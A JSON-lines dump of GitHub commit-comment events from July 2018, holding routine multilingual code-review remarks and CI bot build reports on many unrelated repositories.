{"id":"7962089409","type":"CommitCommentEvent","actor":{"login":"IslandOfCode"},"repo":{"name":"IslandOfCode/jVTLlib"},"payload":{"comment":{"id":29699707,"position":null,"line":null,"path":null,"commit_id":"e3ffb79b3af324b5c197bb3e34e6a4afa8bc4e8b","created_at":"2018-07-13T13:14:36Z","updated_at":"2018-07-13T13:14:36Z","author_association":"OWNER","body":"Ovviamente questo approccio porta ad una nuova potenziale anomalia: se io ho in memoria una variabile con lo stesso nome, questa verrebbe soprascritta e poi rimossa!\r\n\r\nDi nuovo, serve separare la memoria in vari blocchi. "}},"created_at":"2018-07-13T13:14:36Z"}
{"id":"7962090452","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29699715,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-13T13:14:48Z","updated_at":"2018-07-13T13:14:48Z","author_association":"NONE","body":"有其他方式吗？"}},"created_at":"2018-07-13T13:14:48Z"}
{"id":"7962090991","type":"CommitCommentEvent","actor":{"login":"filipef101"},"repo":{"name":"reyalpsirc/react-native"},"payload":{"comment":{"id":29699716,"position":null,"line":null,"path":null,"commit_id":"6b1831e6cd5b6a98c56a12e8566cb5c2a9b90df2","created_at":"2018-07-13T13:14:54Z","updated_at":"2018-07-13T13:14:54Z","author_association":"COLLABORATOR","body":"https://github.com/xiamx/react-native/commit/b35071b"}},"created_at":"2018-07-13T13:14:54Z"}
{"id":"7962093245","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29699727,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T13:15:20Z","updated_at":"2018-07-13T13:15:20Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2976 of 2977 tests passed, 626 test warnings)\n\nMessages:\n\n * 626 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T13:15:20Z"}
{"id":"7962093696","type":"CommitCommentEvent","actor":{"login":"filipef101"},"repo":{"name":"reyalpsirc/react-native"},"payload":{"comment":{"id":29699729,"position":null,"line":null,"path":null,"commit_id":"6b1831e6cd5b6a98c56a12e8566cb5c2a9b90df2","created_at":"2018-07-13T13:15:25Z","updated_at":"2018-07-13T13:15:25Z","author_association":"COLLABORATOR","body":"https://github.com/facebook/react-native/issues/18223"}},"created_at":"2018-07-13T13:15:25Z"}
{"id":"7962099926","type":"CommitCommentEvent","actor":{"login":"vrlink"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29699738,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-13T13:16:36Z","updated_at":"2018-07-13T13:16:36Z","author_association":"NONE","body":"用命令行 cleos 可以转。普通用户估计就要等钱包更新了。"}},"created_at":"2018-07-13T13:16:36Z"}
{"id":"7962104287","type":"CommitCommentEvent","actor":{"login":"silverbulleters-ci-admin"},"repo":{"name":"silverbulleters/vanessa-runner"},"payload":{"comment":{"id":29699746,"position":null,"line":null,"path":null,"commit_id":"8efa0b676c4378e7ea63fd7ed47ba09379c9c660","created_at":"2018-07-13T13:17:27Z","updated_at":"2018-07-13T13:17:27Z","author_association":"COLLABORATOR","body":"This commit has been mentioned on **Automation Driven Development Forum**. There might be relevant details there:\n\nhttps://xdd.silverbulleters.org/t/kak-pravilno-teper-vyzvat-runner-xunit/2148/15\n"}},"created_at":"2018-07-13T13:17:27Z"}
{"id":"7962104604","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29699747,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-13T13:17:30Z","updated_at":"2018-07-13T13:17:30Z","author_association":"COLLABORATOR","body":"Mh... that's not good. Wonder if I can change the code in https://github.com/junit-team/junit5/blob/master/junit-platform-commons-java-9/src/main/java/org/junit/platform/commons/util/ModuleUtils.java to tell the caller what happened."}},"created_at":"2018-07-13T13:17:30Z"}
{"id":"7962105358","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29699749,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-13T13:17:38Z","updated_at":"2018-07-13T13:17:38Z","author_association":"NONE","body":"好的，那等钱包更新吧"}},"created_at":"2018-07-13T13:17:38Z"}
{"id":"7962106201","type":"CommitCommentEvent","actor":{"login":"clason"},"repo":{"name":"ncm2/ncm2"},"payload":{"comment":{"id":29699751,"position":null,"line":null,"path":null,"commit_id":"22d80bc0b93c942eeb07d9c5cbd2ae6927d3cd64","created_at":"2018-07-13T13:17:46Z","updated_at":"2018-07-13T13:17:46Z","author_association":"NONE","body":"This commit broke omnifun autocompletion for `\\cite{` from vim-tex: the `cite` command still autocompletes, but after typing `{`, neovim hangs rather than displaying the list of bibliography items as `<c-x><c-o>` would (and still does). I can open an issue with a minimal example if this helps, but maybe you already see what the problem is?"}},"created_at":"2018-07-13T13:17:46Z"}
{"id":"7962109211","type":"CommitCommentEvent","actor":{"login":"cgwalters"},"repo":{"name":"arithx/mantle"},"payload":{"comment":{"id":29699757,"position":26,"line":301,"path":"platform/machine/qemu/cluster.go","commit_id":"390f50a16cf6a1ce85773afd9710ffc3f25c248a","created_at":"2018-07-13T13:18:16Z","updated_at":"2018-07-13T13:18:16Z","author_association":"NONE","body":"Let's detect this based on filename suffix instead?  If it ends in `.qcow.*` it'd be qcow2 otherwise raw?"}},"created_at":"2018-07-13T13:18:16Z"}
{"id":"7962110829","type":"CommitCommentEvent","actor":{"login":"KevinKreps"},"repo":{"name":"knocon/us_pp_g2_cekkk"},"payload":{"comment":{"id":29699764,"position":65,"line":145,"path":"src/games/Zauberberg/Zauberberg.java","commit_id":"8e32dfbf1bea3e545644be5eca0b47861d9980d6","created_at":"2018-07-13T13:18:33Z","updated_at":"2018-07-13T13:18:33Z","author_association":"COLLABORATOR","body":"Die Karten würde ich erst von der Hand auf den Stapel verschieben, wenn diese ausgespielt werden. Am besten nach jeder ausgespielten Karte diese dann auf den Stapel verschieben. Sonst könnte es Probleme geben bei der Fliegenden Karte. @yilemre "}},"created_at":"2018-07-13T13:18:33Z"}
{"id":"7962112674","type":"CommitCommentEvent","actor":{"login":"TjWallas"},"repo":{"name":"TjWallas/dynamic-netsec"},"payload":{"comment":{"id":29699776,"position":41,"line":23,"path":"democli/API/container.py","commit_id":"c1a76f267a824250e273f048b03d886b7a1c9d5c","created_at":"2018-07-13T13:18:50Z","updated_at":"2018-07-13T13:18:50Z","author_association":"OWNER","body":"@xiecancn Bring the `== True` back. Explicit is better than implicit."}},"created_at":"2018-07-13T13:18:50Z"}
{"id":"7962119931","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29699786,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T13:20:10Z","updated_at":"2018-07-13T13:20:10Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T13:20:10Z"}
{"id":"7962123008","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29699791,"position":null,"line":null,"path":null,"commit_id":"a18d1474a3691f34b763925ff2cc922828394e42","created_at":"2018-07-13T13:20:42Z","updated_at":"2018-07-13T13:20:42Z","author_association":"MEMBER","body":"Ok cool but we'll need another link than our old mega link then."}},"created_at":"2018-07-13T13:20:42Z"}
{"id":"7962123332","type":"CommitCommentEvent","actor":{"login":"chvitved"},"repo":{"name":"humio/docs.humio.com"},"payload":{"comment":{"id":29699793,"position":null,"line":null,"path":null,"commit_id":"9282cf21c19b4fd9a989563c64b914ec0e7371ab","created_at":"2018-07-13T13:20:46Z","updated_at":"2018-07-13T13:20:46Z","author_association":"CONTRIBUTOR","body":"no :( - made another commit that fixed it"}},"created_at":"2018-07-13T13:20:46Z"}
{"id":"7962124453","type":"CommitCommentEvent","actor":{"login":"Baluberdin"},"repo":{"name":"Baluberdin/baluberdin.github.io"},"payload":{"comment":{"id":29699797,"position":1,"line":1,"path":"CNAME","commit_id":"f38560ec75d419f277f021cc20ee8a1b91e5bd6d","created_at":"2018-07-13T13:20:59Z","updated_at":"2018-07-13T13:20:59Z","author_association":"OWNER","body":"baluberdin.com"}},"created_at":"2018-07-13T13:20:59Z"}
{"id":"7962124819","type":"CommitCommentEvent","actor":{"login":"KevinKreps"},"repo":{"name":"knocon/us_pp_g2_cekkk"},"payload":{"comment":{"id":29699798,"position":133,"line":185,"path":"src/games/Zauberberg/Zauberberg.java","commit_id":"8e32dfbf1bea3e545644be5eca0b47861d9980d6","created_at":"2018-07-13T13:21:04Z","updated_at":"2018-07-13T13:21:04Z","author_association":"COLLABORATOR","body":"Das am besten dahin verschieben, wo der Kobold erstellt wird. Das ist glaube ich da wo auch die Spieler erstellt werden.\r\nSo überschreibt man ja immer und immer wieder mit dem selben Wert ;)"}},"created_at":"2018-07-13T13:21:04Z"}
{"id":"7962125060","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29699799,"position":5,"line":4,"path":"src/reducers/Reducer.js","commit_id":"e8e2eaf86eea7015e8bcc4c278283f9f438f72e8","created_at":"2018-07-13T13:21:08Z","updated_at":"2018-07-13T13:21:08Z","author_association":"COLLABORATOR","body":"Think about using an array here for users but we need to be aware of making data updates (immutable)[https://redux.js.org/recipes/structuring-reducers/immutable-update-patterns].  I had lots of issues with this when I first started with Redux."}},"created_at":"2018-07-13T13:21:08Z"}
{"id":"7962125175","type":"CommitCommentEvent","actor":{"login":"ajayns"},"repo":{"name":"collective/gatsby-source-plone"},"payload":{"comment":{"id":29699800,"position":null,"line":null,"path":null,"commit_id":"52c6d4f68c84dec30e1072cda1a11c43a4dd3799","created_at":"2018-07-13T13:21:09Z","updated_at":"2018-07-13T13:21:09Z","author_association":"CONTRIBUTOR","body":"Any explanation for why this fixes our issue? Is it cause we're asynchronously waiting for each nodes separately?"}},"created_at":"2018-07-13T13:21:09Z"}
{"id":"7962126013","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29699803,"position":null,"line":null,"path":null,"commit_id":"fadfe87444829290a73c79e3eceed4ffc07b98cf","created_at":"2018-07-13T13:21:18Z","updated_at":"2018-07-13T13:21:18Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-13T13:21:18Z"}
{"id":"7962130052","type":"CommitCommentEvent","actor":{"login":"reyalpsirc"},"repo":{"name":"reyalpsirc/react-native"},"payload":{"comment":{"id":29699811,"position":null,"line":null,"path":null,"commit_id":"6b1831e6cd5b6a98c56a12e8566cb5c2a9b90df2","created_at":"2018-07-13T13:22:07Z","updated_at":"2018-07-13T13:22:07Z","author_association":"OWNER","body":"@Rumidom @filipef101 The correct way to handle that is now done on branch `custom_0.54.0`"}},"created_at":"2018-07-13T13:22:07Z"}
{"id":"7962130568","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29699812,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T13:22:13Z","updated_at":"2018-07-13T13:22:13Z","author_association":"OWNER","body":"It's getting confusing"}},"created_at":"2018-07-13T13:22:13Z"}
{"id":"7962133539","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29699814,"position":null,"line":null,"path":null,"commit_id":"151b9fb11247bc5d55e728d074d301678fa6779b","created_at":"2018-07-13T13:22:47Z","updated_at":"2018-07-13T13:22:47Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-13T13:22:47Z"}
{"id":"7962166005","type":"CommitCommentEvent","actor":{"login":"ott2"},"repo":{"name":"conjure-cp/conjure"},"payload":{"comment":{"id":29699896,"position":null,"line":null,"path":null,"commit_id":"df9fa68836e18ea80fb91a93e1e65384c8bce08f","created_at":"2018-07-13T13:29:04Z","updated_at":"2018-07-13T13:29:04Z","author_association":"COLLABORATOR","body":"Nice, thanks!"}},"created_at":"2018-07-13T13:29:04Z"}
{"id":"7962173579","type":"CommitCommentEvent","actor":{"login":"rachinin1"},"repo":{"name":"ultrakiwi99/pulstime.ru"},"payload":{"comment":{"id":29699913,"position":null,"line":null,"path":null,"commit_id":"135b5d6f3512ff4f9218cb3ccd46c63e6b1c99ee","created_at":"2018-07-13T13:30:30Z","updated_at":"2018-07-13T13:30:30Z","author_association":"COLLABORATOR","body":"@ultrakiwi99 промокоды затестил - теперь всё ок"}},"created_at":"2018-07-13T13:30:30Z"}
{"id":"7962175570","type":"CommitCommentEvent","actor":{"login":"zsinx6"},"repo":{"name":"josenberg/c_language_course"},"payload":{"comment":{"id":29699917,"position":15,"line":11,"path":"reading_input.c","commit_id":"5db988ebddcc9f7c3a4704556b1850ea17ba6f95","created_at":"2018-07-13T13:30:51Z","updated_at":"2018-07-13T13:30:51Z","author_association":"NONE","body":"When reading double, you must use \"%lf\" instead of \"%f\", please refer to: http://www.cplusplus.com/reference/cstdio/scanf/ and https://stackoverflow.com/questions/13730188/reading-in-double-values-with-scanf-in-c"}},"created_at":"2018-07-13T13:30:51Z"}
{"id":"7962184056","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29699935,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T13:32:30Z","updated_at":"2018-07-13T13:32:30Z","author_association":"NONE","body":"Yep, although not that confusing. Try?"}},"created_at":"2018-07-13T13:32:30Z"}
{"id":"7962185710","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29699943,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T13:32:50Z","updated_at":"2018-07-13T13:32:50Z","author_association":"NONE","body":"The goal here is gas optimisation"}},"created_at":"2018-07-13T13:32:50Z"}
{"id":"7962188789","type":"CommitCommentEvent","actor":{"login":"KevinKreps"},"repo":{"name":"knocon/us_pp_g2_cekkk"},"payload":{"comment":{"id":29699947,"position":132,"line":80,"path":"src/games/Zauberberg/Kobold.java","commit_id":"8e32dfbf1bea3e545644be5eca0b47861d9980d6","created_at":"2018-07-13T13:33:27Z","updated_at":"2018-07-13T13:33:27Z","author_association":"COLLABORATOR","body":"Nur um die Idee zu verstehen: Wenn hier z.B. die Fliegende Karte liegt, wird die Ereignisanfrage gemacht und nach der Anfrage kommt die Antwort mit der Karte. Diese wird dann einfach dem Array kartenWerte hinten angehängt. Andere Ereignisse lösen natürlich unterschiedliche Dinge aus"}},"created_at":"2018-07-13T13:33:27Z"}
{"id":"7962189167","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/chat"},"payload":{"comment":{"id":29699948,"position":null,"line":null,"path":null,"commit_id":"6b6d4cdebe578acf7e3ee51e9ba7f8368f8525a9","created_at":"2018-07-13T13:33:32Z","updated_at":"2018-07-13T13:33:32Z","author_association":"OWNER","body":"WOW\r\n"}},"created_at":"2018-07-13T13:33:32Z"}
{"id":"7962191930","type":"CommitCommentEvent","actor":{"login":"frogg"},"repo":{"name":"OasysFoundation/Oasys-Toolbox-React"},"payload":{"comment":{"id":29699955,"position":7,"line":151,"path":"src/QuillEditor.js","commit_id":"301447759675e50fd836504cc2ef653eda3f98a4","created_at":"2018-07-13T13:34:04Z","updated_at":"2018-07-13T13:34:04Z","author_association":"MEMBER","body":"Please see https://github.com/OasysFoundation/Oasys-Toolbox-React/issues/154"}},"created_at":"2018-07-13T13:34:04Z"}
{"id":"7962194414","type":"CommitCommentEvent","actor":{"login":"tizmagik"},"repo":{"name":"tizmagik/react-head"},"payload":{"comment":{"id":29699958,"position":5,"line":51,"path":"src/__tests__/HeadTags.web.test.js","commit_id":"c1bb5b10e0cb10d450079c41b011bff3f1593a8b","created_at":"2018-07-13T13:34:33Z","updated_at":"2018-07-13T13:34:33Z","author_association":"OWNER","body":"Remember to remove the only before merging "}},"created_at":"2018-07-13T13:34:33Z"}
{"id":"7962195073","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29699959,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T13:34:40Z","updated_at":"2018-07-13T13:34:40Z","author_association":"OWNER","body":"Ok, let me try"}},"created_at":"2018-07-13T13:34:40Z"}
{"id":"7962195496","type":"CommitCommentEvent","actor":{"login":"shiltemann"},"repo":{"name":"willemdek11/tools-iuc"},"payload":{"comment":{"id":29699960,"position":null,"line":null,"path":null,"commit_id":"632ec1b997d8e8dc85151e113887eb695c7f6af2","created_at":"2018-07-13T13:34:45Z","updated_at":"2018-07-13T13:34:45Z","author_association":"NONE","body":"als je vast de test toevoegt die je aan de praat wil krijgen (incl test datasets) dan is het makkelijker voor mij om te helpen  :)"}},"created_at":"2018-07-13T13:34:45Z"}
{"id":"7962195974","type":"CommitCommentEvent","actor":{"login":"paramjeetbhinder"},"repo":{"name":"paramjeetbhinder/MAD_3004"},"payload":{"comment":{"id":29699963,"position":1,"line":1,"path":"README.md","commit_id":"a73c7e9c996c04f1c52b72123ab5fd1547be824f","created_at":"2018-07-13T13:34:50Z","updated_at":"2018-07-13T13:34:50Z","author_association":"OWNER","body":"Keilla Bhinder's File"}},"created_at":"2018-07-13T13:34:50Z"}
{"id":"7962204358","type":"CommitCommentEvent","actor":{"login":"ggallici"},"repo":{"name":"aocoda/Tp-Arena"},"payload":{"comment":{"id":29699988,"position":null,"line":null,"path":null,"commit_id":"fd5ff6940c8951c1e0e3e89d2247cfd23fcc7e00","created_at":"2018-07-13T13:36:26Z","updated_at":"2018-07-13T13:36:26Z","author_association":"COLLABORATOR","body":"inyeccion de neutrones? "}},"created_at":"2018-07-13T13:36:26Z"}
{"id":"7962204845","type":"CommitCommentEvent","actor":{"login":"vovapasko"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29699990,"position":null,"line":null,"path":null,"commit_id":"9bbea7dab9fb504c95f98a6490c16c49c8f8f2b8","created_at":"2018-07-13T13:36:31Z","updated_at":"2018-07-13T13:36:31Z","author_association":"OWNER","body":"Are you ohrenel tam?"}},"created_at":"2018-07-13T13:36:31Z"}
{"id":"7962206793","type":"CommitCommentEvent","actor":{"login":"Fra298"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29699995,"position":12,"line":24524,"path":"ACID/acid_wotlk.sql","commit_id":"0727ca1ea373fa4e5cffb91f4940e35d3199ad02","created_at":"2018-07-13T13:36:55Z","updated_at":"2018-07-13T13:36:55Z","author_association":"NONE","body":"This line should be removed?\r\nGot error when importing with installscript : \r\n`ERROR 1062 (23000) at line 24389: Duplicate entry '2524404' for key 'PRIMARY'\r\nERROR: cannot apply ACID/acid_wotlk.sql\r\n`"}},"created_at":"2018-07-13T13:36:55Z"}
{"id":"7962206853","type":"CommitCommentEvent","actor":{"login":"vovapasko"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29699996,"position":5,"line":6,"path":"DBConnector.py","commit_id":"9bbea7dab9fb504c95f98a6490c16c49c8f8f2b8","created_at":"2018-07-13T13:36:56Z","updated_at":"2018-07-13T13:36:56Z","author_association":"OWNER","body":"It is not only your company"}},"created_at":"2018-07-13T13:36:56Z"}
{"id":"7962209232","type":"CommitCommentEvent","actor":{"login":"hdgarrood"},"repo":{"name":"purescript/purescript-prelude"},"payload":{"comment":{"id":29700003,"position":null,"line":null,"path":null,"commit_id":"3b0d306c0fa20af4803fdad2313f250d4e388d35","created_at":"2018-07-13T13:37:23Z","updated_at":"2018-07-13T13:37:23Z","author_association":"CONTRIBUTOR","body":"I can see that an unlawful `Eq a` instance induces an unlawful `Eq (Array a)` instance, but I don’t think I would regard it as a problem. We strongly discourage unlawful instances precisely because they have a tendency to cause these sorts of surprising behaviours.\r\n\r\nIt’s not clear to me that referential transparency is being violated here, incidentally."}},"created_at":"2018-07-13T13:37:23Z"}
{"id":"7962210710","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"dsh2dsh/OGSR-Engine"},"payload":{"comment":{"id":29700005,"position":null,"line":null,"path":null,"commit_id":"de7ff0c41bf7821f03bcd01b4003593a412705a7","created_at":"2018-07-13T13:37:39Z","updated_at":"2018-07-13T13:37:39Z","author_association":"NONE","body":"Скрипт всё ещё нужен?"}},"created_at":"2018-07-13T13:37:39Z"}
{"id":"7962213788","type":"CommitCommentEvent","actor":{"login":"reusspaul"},"repo":{"name":"reusspaul/NAO"},"payload":{"comment":{"id":29700013,"position":null,"line":null,"path":null,"commit_id":"796cc5eff91bac4cdde2ab4eb9208ce418a54fd1","created_at":"2018-07-13T13:38:14Z","updated_at":"2018-07-13T13:38:14Z","author_association":"OWNER","body":"NAO est un ensemble de logiciels pédagogiques sur la neutronique et de notices associées.\r\nCe produit permet un apprentissage approfondi de cette branche de la physique des réacteurs nucléaires."}},"created_at":"2018-07-13T13:38:14Z"}
{"id":"7962214515","type":"CommitCommentEvent","actor":{"login":"papr"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29700016,"position":null,"line":null,"path":null,"commit_id":"ce949dd72a72566129c0e873eb5160125a883daf","created_at":"2018-07-13T13:38:22Z","updated_at":"2018-07-13T13:38:22Z","author_association":"MEMBER","body":"You changed basically two things. 1) Replace deque with lists. This trades off readability with performance. OK. 2) Change how the xlim values of the timelines are calculated. Previously xlim was set as the first and last world ts. The new way uses first and last pupil timestamps. Technically not wrong but the timeline will be scaled between these values. All other timelines are scaled between first and last World timestamp. This change might lead to misaligned timelines. This was probably not intended. "}},"created_at":"2018-07-13T13:38:22Z"}
{"id":"7962215879","type":"CommitCommentEvent","actor":{"login":"arithx"},"repo":{"name":"arithx/mantle"},"payload":{"comment":{"id":29700017,"position":26,"line":301,"path":"platform/machine/qemu/cluster.go","commit_id":"390f50a16cf6a1ce85773afd9710ffc3f25c248a","created_at":"2018-07-13T13:38:39Z","updated_at":"2018-07-13T13:38:39Z","author_association":"OWNER","body":"I think overall shipping a raw image in RHCOS is a better solution and then the `qemu` platform handles that case alone. If we start going down the path of supporting different backing formats I'd rather see us move in the direction of changing the image names to be something like `x.qemu.qcow2` rather than the current (as `qcow` is also a valid backing format for `qemu-img`)"}},"created_at":"2018-07-13T13:38:39Z"}
{"id":"7962215899","type":"CommitCommentEvent","actor":{"login":"Blade2021"},"repo":{"name":"Blade2021/AssemblyAuto"},"payload":{"comment":{"id":29700018,"position":2164,"line":1292,"path":"AssemblyAuto/AssemblyAuto.ino","commit_id":"e721d4084c4e6f6b2c77587957e9d13b82d874ca","created_at":"2018-07-13T13:38:39Z","updated_at":"2018-07-13T13:38:39Z","author_association":"OWNER","body":"Added this line to combat leftover characters from leaving display override"}},"created_at":"2018-07-13T13:38:39Z"}
{"id":"7962223831","type":"CommitCommentEvent","actor":{"login":"hdgarrood"},"repo":{"name":"purescript/purescript-prelude"},"payload":{"comment":{"id":29700049,"position":null,"line":null,"path":null,"commit_id":"3b0d306c0fa20af4803fdad2313f250d4e388d35","created_at":"2018-07-13T13:40:12Z","updated_at":"2018-07-13T13:40:12Z","author_association":"CONTRIBUTOR","body":"Sorry, I take that back, of course this is referential transparency being violated because replacing `vs` with its definition on one side of `==` would change the result. But I still wouldn’t consider this a bug if it can only be observed with unlawful instances."}},"created_at":"2018-07-13T13:40:12Z"}
{"id":"7962227144","type":"CommitCommentEvent","actor":{"login":"nicooff"},"repo":{"name":"Nek5000/Nek5000"},"payload":{"comment":{"id":29700056,"position":null,"line":null,"path":null,"commit_id":"c902ef522bf0e18284c53b47b30a79bd54fce291","created_at":"2018-07-13T13:40:48Z","updated_at":"2018-07-13T13:40:48Z","author_association":"CONTRIBUTOR","body":"Thanks for pushing this. One question: don't you need a c++ compiler for building hypre? Where is this set? Maybe I'm missing it. "}},"created_at":"2018-07-13T13:40:48Z"}
{"id":"7962227849","type":"CommitCommentEvent","actor":{"login":"bmrquad"},"repo":{"name":"nikochan2k/gpslogger2probemon"},"payload":{"comment":{"id":29700057,"position":null,"line":null,"path":null,"commit_id":"0f4d30972c1b6a71ec71fdb1c85a910aa7f1e26c","created_at":"2018-07-13T13:40:56Z","updated_at":"2018-07-13T13:40:56Z","author_association":"NONE","body":"Can you let me know once your finish?\n\nThanks,\nB\n\nOn Fri, Jul 13, 2018 at 07:31 Yoshihiro Seki <notifications@github.com>\nwrote:\n\n> This is just a sample code. Feel free to copy it if you like.\n>\n> I wrote new code inspired by \"probemon\".\n> https://github.com/nikochan2k/pi-collector\n> This can collect wifi and bluetooth mac address with GPS position.\n> I'll finish up this code during this month, I'll also write \"Readme.md\"\n> properly.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nikochan2k/gpslogger2probemon/commit/0f4d30972c1b6a71ec71fdb1c85a910aa7f1e26c#commitcomment-29698647>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnHweLbpOM6Rsc0hbjN1LAquzSARgyieks5uGIUEgaJpZM4VOMzn>\n> .\n>\n"}},"created_at":"2018-07-13T13:40:56Z"}
{"id":"7962227997","type":"CommitCommentEvent","actor":{"login":"Manikaran20"},"repo":{"name":"benblumson/Mereology"},"payload":{"comment":{"id":29700058,"position":465,"line":465,"path":"Mereotopology.thy","commit_id":"259833fb458a52021b2353e189166cd847f0e9a1","created_at":"2018-07-13T13:40:58Z","updated_at":"2018-07-13T13:40:58Z","author_association":"COLLABORATOR","body":"No, the call to blast is not working and even sledgehammer gives no proof to this proposition."}},"created_at":"2018-07-13T13:40:58Z"}
{"id":"7962229729","type":"CommitCommentEvent","actor":{"login":"Manikaran20"},"repo":{"name":"benblumson/Mereology"},"payload":{"comment":{"id":29700065,"position":511,"line":511,"path":"Mereotopology.thy","commit_id":"259833fb458a52021b2353e189166cd847f0e9a1","created_at":"2018-07-13T13:41:18Z","updated_at":"2018-07-13T13:41:18Z","author_association":"COLLABORATOR","body":"Ok, Thanks.\r\n"}},"created_at":"2018-07-13T13:41:18Z"}
{"id":"7962230692","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29700070,"position":51,"line":357,"path":"gui/CMainWindow.cpp","commit_id":"d0f90ea9f566a2d29432e4cb9f4f669114083e50","created_at":"2018-07-13T13:41:30Z","updated_at":"2018-07-13T13:41:30Z","author_association":"OWNER","body":"@EduFdez This launches the thread properly, the textbrowser gets updated in real time. But once the thread finishes, accessing the gui causes a crash.\r\n\r\n```\r\nQObject::connect: Cannot queue arguments of type 'QTextCursor'\r\n(Make sure 'QTextCursor' is registered using qRegisterMetaType().)\r\n```"}},"created_at":"2018-07-13T13:41:30Z"}
